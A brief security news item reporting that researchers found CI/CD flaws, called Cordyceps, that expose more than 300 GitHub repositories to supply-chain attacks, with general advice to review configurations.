Cordyceps CI/CD Flaws Expose 300+ GitHub Repositories to Supply-Chain Attacks
Security researchers have identified vulnerabilities in Cordyceps CI/CD systems that expose more than 300 GitHub repositories to supply-chain attacks. The flaws could enable attackers to inject malicious code into the software build process, compromising the integrity of the resulting artifacts. This type of attack is particularly dangerous because it can affect all downstream users who download or use the compromised software. The affected repositories span various projects, though specific names were not disclosed. The researchers reported the issues to the maintainers, but no patches have been released yet. Developers using Cordyceps CI/CD are advised to review their configurations and monitor for unusual activity. The discovery highlights ongoing risks in the software supply chain, where CI/CD pipeline vulnerabilities can have widespread impact.
CI/CD flaws can lead to widespread supply-chain compromise, affecting all users of compromised software.